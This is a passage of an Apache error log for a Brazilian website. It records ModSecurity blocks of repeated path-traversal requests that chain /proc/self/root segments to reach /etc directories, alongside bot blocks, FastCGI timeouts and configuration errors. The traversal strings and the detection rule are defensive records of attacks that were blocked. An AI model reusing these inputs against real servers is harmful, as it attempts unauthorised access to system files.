"abuNXQbLMZ6AikZjR9UbGwAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:45:05.258714 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:55178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNYf-YZRR_7pZ7nDJLgwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:45:08.981660 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:45508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNZF_V7PWP6ixUYl550gAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:45:11.195695 2026] [mime_magic:error] [pid 26799:tid 140411624429312] (70014)End of file found: [client 57.141.18.74:49948] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:45:12.057817 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:45:13.570534 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:45512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNaOoXxyEfFpUF8f_P2AAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:45:20.728078 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:45524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNcAkwaGbbGflqUZBwAgAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:45:27.680702 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:41778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNd8df6f5d65gmYZQwfQAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:45:35.126264 2026] [proxy_fcgi:error] [pid 19093:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:45:37.567233 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:36204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNgQbLMZ6AikZjR9UbLQAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:45:39.064282 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:41778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNg8df6f5d65gmYZQwhAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:45:43.248377 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:45802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNh-oXxyEfFpUF8f_P6AAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:45:44.423486 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.241.31:56844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNiP-YZRR_7pZ7nDJLkwAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:45:59.221044 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:45806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNl9a6ubjKNq_cu4b5lgAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:46:00.126230 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49552] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:46:22.031320 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.244.43:49196] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuNrta6ubjKNq_cu4b5owAAA0c"]
[Thu Mar 19 02:46:23.009157 2026] [mime_magic:error] [pid 19093:tid 140411666392832] (70014)End of file found: [client 57.141.18.92:50766] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:46:31.142004 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50162] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:47:00.077875 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50668] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:47:32.133762 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:47:38.745936 2026] [mime_magic:error] [pid 27293:tid 140411716749056] (70014)End of file found: [client 57.141.18.45:52866] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:48:01.129781 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51980] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:48:28.129765 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52598] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:48:41.976547 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.228.61:34478] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuOOda6ubjKNq_cu4b54AAAA1A"]
[Thu Mar 19 02:48:51.141822 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53104] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:49:13.146100 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53584] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:49:34.105916 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53936] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:49:57.149855 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54492] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:50:20.037671 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:50:39.000304 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.241.31:56248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuOrv-YZRR_7pZ7nDJMSwAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:50:41.455979 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:36968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuOseyqAr6etmhZHNoi4QAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:50:42.129853 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55432] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:50:44.504861 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.241.31:36974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuOtBkFeYa1D6dYQnCq9gAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:50:47.413251 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:56114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuOt_u8EFLIOrSqIpta1gAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:50:53.919595 2026] [core:alert] [pid 17887:tid 140411607643904] [client 57.141.18.39:56992] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:51:02.012206 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:56126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuOxta6ubjKNq_cu4b6QgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:05.122194 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:51:05.166852 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:48346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuOycdf6f5d65gmYZQxOQAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:07.775984 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:47130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuOywbLMZ6AikZjR9UbqwAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:09.854174 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:47140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 